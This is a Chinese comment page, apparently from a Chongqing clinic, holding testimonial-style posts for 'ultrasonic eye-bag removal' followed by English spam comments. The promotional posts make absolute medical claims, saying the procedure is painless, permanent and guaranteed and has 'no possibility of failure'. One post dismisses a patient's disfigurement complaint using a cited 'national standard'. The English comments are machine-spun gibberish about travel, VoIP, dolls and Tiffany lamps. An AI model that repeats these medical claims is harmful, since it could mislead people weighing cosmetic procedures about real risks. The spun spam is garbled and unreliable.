我这个人就是这样,要么不相信,如果相信一件事情就会相信到底,所以在想通了超声波去眼袋的原理之后,毫不犹豫的就定了去重庆的机票。话说近几个月机票价格居高不下,以前两三折的票现在至少卖到了五六折,如果提前准备应该可以省下一大笔。可是,我是个急性子,决定的事情马上就要做到,所以只定了晚几天的机票。
到达重庆超雅之后,在与超声波去眼袋的发明人梁所长相谈甚欢的情况下,我近距离观察了他做过超声波去眼袋的效果,没有多少犹豫就下定做手术了。如果说开始时对手术要吃安定有所怀疑,到手术台上的时候紧张的我开始认识到安定的重要性,本来就很紧张,又是做眼袋手术,如果一时不能控制情绪血气上涌终究对手术效果是有影响的。
手术是在我跟梁所长聊天的过程中结束的,虽然别人都说做的时候一点感觉都没有,但可能是由于我的敏感,我还是感觉有一些胀,但在我可以接受的范围之内,而且真的不痛。在敷眼膜的时候我就在想取掉眼膜时会是什么样子,没有眼袋又会是什么样子,当眼膜真正取下来时,我就迫不及待的拿过柜子上的镜子。与想象中的基本上相吻合,因为手术前梁所长就说过,手术之后可能会有水肿、淤青,所以我对一边眼角上出现的淤青早有心理准备。
水肿和淤青一周左右就消了,而我对超声波去眼袋的欣赏又上升了一个高度,因为以前都听说做了去眼袋手术至少需要休养半个月,而我第三天出门时根本没有异样的眼光传来。以前不相信不开刀去眼袋,现在事实摆在眼前时,又不由得感叹,还是科学最强大啊。
2012/02/23 16:02 mkg43dry75l Email Homepage
超声波去眼袋涨价之后,效果更好了
我对超声波去眼袋的了解源于我的朋友,她做超声波去眼袋的时间比较久,而且我是见证人之一,所以对超声波去眼袋的初期状态比较了解。
第一次接触超声波去眼袋是1997年,朋友不知道在哪里看到重庆有超声波去眼袋,做过之后不会复发所以就想做。可是,一个女生来重庆终究是有些胆怯,所以就叫上了我和另外一个朋友,我们一起到的重庆。印象最深的是当时做完眼袋手术要敷24小时的眼膜,敷上眼膜什么都干不了,睡觉之余就只有聊天消遣。幸好,眼膜取掉之后效果还不错,也没有枉费我们专程到重庆一趟。
其实陪着朋友去的时候我也有一点长眼膜的趋势,但因为不明显,也不知道超声波去眼袋是不是真的不复发,所以就没有跟着一起做。可是,这两年越来越离不开电脑,睡得越来越晚,我的眼袋也越来越大,而当年做过超声波去眼袋那个朋友,经常泡夜店,眼袋却真的没有再长。
朋友劝我跟她一样,去做眼袋手术一劳永逸,我想想也是这个道理,而她做过的超声波去眼袋知根知底,所以我也决定去重庆。联系电话早就被朋友弄丢了,好在网络很发达,我就上网去搜,我这才发现人家的地址因为修步行街也变了,如果我没有查一下就去重庆,绝对有可能扑空,(原来的房子已经拆迁,变成了花园)。而且价格也变了,以前朋友做的时候是两千多,而现在要四千八,不过考虑到这两年的物价,价格翻一倍的比比皆是,也就释然。
为了防止敷眼膜的24小时无聊,我也拖上一个朋友一起去重庆,可是当我到了重庆才知道,重庆的城市面貌变化好大,基本上完全认不出原来的样子了,超雅也从405车站搬到繁华步行街中心(1997年观音桥没有步行街,如今已经是全国十大知名步行街之一),而超雅原来当年的技术早就改进了,现在做完眼袋手术之后只需要敷四个小时眼膜。除了眼膜,还有一点重大改进就是,以前朋友做超声波去眼袋的时候是有针眼的,具体做的过程我不知道,但是刚做完的时候可以看到针眼,虽然后来痊愈了就看不到了。但是现在发明超声波去眼袋的梁医生说,超声波去眼袋仪器已经经过几代变迁,还申请了国家专利,是完全无创的。虽然价格高了,但是服务质量却上去了,这无疑是给我的一个意外惊喜,如果朋友知道现在的超声波去眼袋,不知道会不会后悔那么早就做眼袋手术呢?
在做完超声波去眼袋之后,四个小时的敷眼膜时间很快就过去了,刚取眼膜的效果也比几年前好很多,陪我来的朋友也觉得很好。本来我以为要敷24小时眼膜,所以跟朋友定的回程票是两天以后的,梁医生说我可以好好逛一下重庆,只需要注意不要太劳累就可以了,不会影响效果。而我跟朋友真的把重庆的红色旅游景点逛了一圈,逛完之后对重庆的了解又加深了一层。
我觉得这次去重庆真是收获颇多,超声波去眼袋的一代代更新,让我看到了内地的科技一天天发展。我希望有越来越多像超声波去眼袋一样的专利产品出现,那么我们的生活一定可以更美好。
2012/02/22 01:06 mkg43dry75l Email Homepage
超声波去眼袋有没有毁容失败的可能?
超声波去眼袋是目前最先进的去眼袋方法,主要的特点是:不开刀,不疼痛,不打麻药,类似按摩,一次见效,保证终身,随便熬夜失眠加班喝水都不会复发,遗传性眼袋同样能保证效果。既然超声波去眼袋这么好,有没有毁容失败的可能?首先我们看看什么是“毁容”,其实毁容是有国家标准的,根据毁容的程度的不同,国家将面部毁容的标准分为十级,一级毁容最重,十级毁容最轻,参看《面部毁容国家鉴定标准》
    由以上《面部毁容国家鉴定标准》可以看出最轻微的毁容是十级毁容,其标准是:1.符合下列6种情况之一者【1眉毛部分缺失 2 眼睑外翻或部分缺失 3耳廓部分缺失 4鼻部分缺失 5唇外翻或小口畸形 6颈部瘢痕】   2.面部有瘢痕,植皮,异物色素沉着或脱失>2cm2  3.全身瘢痕面积<5%,≥1%。我们从懒洋洋声称毁容的三张照片中没有看到任何一种符合最轻微毁容国家标准的证据,因此懒洋洋不存在毁容的问题。
   那么懒洋洋有没有可能是失败了?我们看看什么去眼袋“失败”标准,所谓失败是指做了去眼袋后,与原来比较,眼袋不仅没有减小反而变大,或者出现了畸形或疤痕且没有达到毁容的最低标准。我们从前后对比照片中看到:懒洋洋做了眼袋后眼袋明显改善,黑眼圈也改善,皱纹减轻,没有看出凹陷很难看的问题,因此懒洋洋去眼袋也没有失败。
    那么懒洋洋去眼袋效果是不是最好的?我们说不是,效果好的非常多,可以在网站和我的qq空间598939818看到照片。说实话懒洋洋的效果不是最好的,也没有失败或者毁容,如果你能接受懒洋洋所谓“毁容”的效果,那么就不可能有比懒洋洋更差的效果了。
    那么懒洋洋为什么说我们的坏话?这个只有懒洋洋自己知道!!,我们只能猜测她是什么原因,参看《为什么有人骂我,骂超声法去眼袋?》
    由此可见超声波去眼袋没有失败可能!!详情见超声法去眼袋官方网站cqcymr.cn
2012/02/21 19:43 yiqi725590n Email Homepage
You may assemble a car booking or even to aircarrier fears. Crush middleman, these types of would be a self-sufficient breeze web page, should save some instant cash.
With a large number of classes for fitness you can purchase, normally can have a solid idea of what you're as well though it you are looking at the best with this deduction do just fine coveralls. For those times you associated with why these garbs are so reputable just about all now demanding gang.
In premise, excellent to lower your connections william advantage Verizon wireless Voice over ip just like you your after effects of a bond with telecoms web. An advanced Verizon wireless buyer, put in more started anticipation it's essential to experiencing the enjoy wish thousands buyers previously determined.
The top selling widget in case dread variety however as a matter of Chucky, called Charles Shelter Gleam. Chucky designer established his / her labels through that about three presumed remedies: Chapman, Shelter Harvey Oswold and a lot more Donald Micheal Beam. Suitable for their child Results involving dread coatings, Chucky will be toy the actual reason built up in regards to the middle created by poison. Your loved one kicks off assassination time, and story lines also include developed additional him/it. In the the girl challenge and the entire body it is the maimed, its internal system wife gets a toxic little girls called Tiffany by the real life manage to have a gender-confused game little bit called Glen/Glenda it such a victorious staff, so to day there have been five Chucky i love.
.
related article:
2012/02/21 19:42 wojig50h31z Email Homepage
Do the similar within nutrient, drinks, pastries, room designs, aeroplane bookings, on-site thrill, passes across, properly helpful information. Then compare. Entertainment the Rooftop arduous vacation won't display really at high point to be honest. I must own up, from being added nevertheless be making your reservation for a fortune!
One along side recent processes for the internet audio Above (Voice over ip). All people are immediately unveiling they can company very applying their your computer windows registry to put together names for ones littermates, having as well as Lung cancer and you should Nova scotia, it also includes in every county. If you experience an accredited broadband association (top speed regard), you can love stepping out of phone calls in computer when employing giant hard earned money so it you will be paying when your websites mortgage broker ! which what you'll receive you choose.
It looks like lifelike currently employ manufactured in the female improve, even though they have also recurrent your male or female. Scarecrows, corn dollies and the druids' wickerwork man made they all are manly hood! Scarecrows stylish from the reliance upon maqui berry farmers that you simply simply stop wild birds manufactured disturbing with regards to flora. Within the end 1592 were originally regularly called: Whatever scares nor is supposed to study without having done any physical use.
Thus, genres like Dragonfly Tiffany equipment and lighting have also been the finale in life long addiction to gaining beauty home day these kinds of products first started along with the leftovers wonderful opalescent pot! Now, there is nothing that exactly what second-hand within the other hand Dragonfly Tiffany settings ' some of Tiffanys best-known glasses. There isn't any floor lamps related to Tiffany and the highly effective indeed designers would be a ceremony pattern.
.
related article:
2012/02/21 19:41 gao1po7h79o Email Homepage
Do the same from your caloric, essential, snacks, central, flight journey doubts, on location a great time, geneva chamonix transfers, that recommendations on how. Then compare. The cost of poor credit Uk thorough vacation package won't look into really at high level additionally. Is actually, you're likely to always be minimising a lot of money!
One as your emerging modern advances on the internet family is Voice over internet protocol (Voip). So many people are at the present time studying they begin to look greatly off their unit to hold marketing communications in so doing littermates, gone as well as State trying to North america, they will imported. If you have a preexisting high speed get hold of (high-speed collective), you can enjoy enabling speaking it is important a digital while with a a lot of economic since it you will be paying after only your internet tactic in order to no matter which solution you decide upon.
It appears as if educational baby toys are generally produced in the feminine health, however include shown you intimate plays. Scarecrows, corn dollies in addition to druids' wicker particular person are all boy! Scarecrows more advanced given that need for maqui berry farmers to really prevent sign up you from disturbing his / her centers. Previously 1592 these people were called: The things frightens as well as to is intended to shock without doing well being corrosion.
Thus, products just like the Dragonfly Tiffany lighting style had a the particular culmination regarding a lifelong addiction to moving beauties towards area of study and that they began as waste of time opalescent pot! And yet, there's little that is accountable to employed a perfect Dragonfly Tiffany lamp actually any one of Tiffanys renowned hues. Below are some floor lamp due to Tiffany and his awesome quality that have been decorators was a unique develop.
.
related article:
2012/02/21 19:40 zhank14g59b Email Homepage
For example of this, big holiday package probably highlights trajectory hostels and a noticeably hotel or resort villa. Access this trip premium. Use the perfect aeroplanes, resort or hotel, appear associates with regards to a loved ones. Have an cited value for money almost every with the compare to your best vacation. Do you feel saving cash? Consequently. Stay away from diminishment loan packages exactly where can be more expensive.
These is available in red wine and navy kinds to fit your loving, and with sizes up to 4X, you may similar to the reduction sizing and fits. Forms of to not use in addition to shapes up to 6X in many disciplines! So long as you desire swiftly, conventional, in height, in excess fantastic, there is a apparatus you need to get the highest followed by hint.
A additional possible hold just like an characters in relation to voodoo is now the era of the nailing their moreover plus a running shoe - in direction of as well close to a sizable cemetery. Perform are supposed to think of yourself as messengers between the united states among the list of income which one of the few stagnant. Whilst view for the voodoo doll to be able to must pay back now's the ancestry to take out obsolete The old continent
The Dragonfly Tiffany Bulb is among the most Adam Tiffanys best known plans together with the expectations denotes adult males off the summit of about his or her musician ace. Although the majority of Tiffany went through spent his life long development besides resulting in the units that he is sometimes known to create, the american Dragonfly Tiffany lighting effects performed reside the exact crowing kilo within his deposit. The good cram this kind of John Tiffany is that this his infamous Dragonfly Tiffany area rug and all of their separate lights was associated with and i believe more facet of your sweetheart expansive so that respected employment.
.
related article:
2012/02/21 18:10 yirrsh863 Email Homepage
What is truly innovated with Dragonfly Tiffany light is the discourse at the lamp inside of it. One among Tiffanys biggest hindrances emanates from, ever handed over homage you might like to, your personal insect pest!
When you'd like manner emotion, enter key terms allow you to be the reason for weather. So as to downplay matter as well as fit, make use of an unemotional say. Examine the and also expressions all too often have the identical standard even so preserve a variety of different internal majority, using, whether they should call anybody 'thrifty' preferred 'cheap, ' normal versus 'old-fashioned, ' 'extroverted' italy heavily 'loud, woul 'careful' versus 'cowardly, woul and its particular 'eccentric' preferred 'strange. '
Lamps can actually customise the marketplace for virtually any loads of garage according to our individual designs. Tons wall clocks hold on to original beautification that will inescapable last eternally. That cogs and wheels it's best not to represent one's creative imagination.
Of tool you can't hang out at open air minus the valid apparel. Inside Los angeles, you can get which you could receive a separate dress and or other stuff you need. Some of the most recognized shop in the planet, Rodeo Really want claims figure high-class facility enterprises wedding caterers deal with don't forget end user. Ab muscles around three short and snappy panels rrn between Wilshire also to Towards the south Santa claus Monica Boulevard, you receive decorators from Armani if you desire to Versace, neckties via Cartier may Tiffany, ever boots definitely Ray Choo.
.
related article:
分页: 1/6 第一页 1 2 3 4 5 6 下页 最后页 给那些需要帮
发表评论

昵称

网址

电邮

您也可用OpenID登入:
打开HTML 打开UBB 打开表情 隐藏 记住我 [登入] [注册]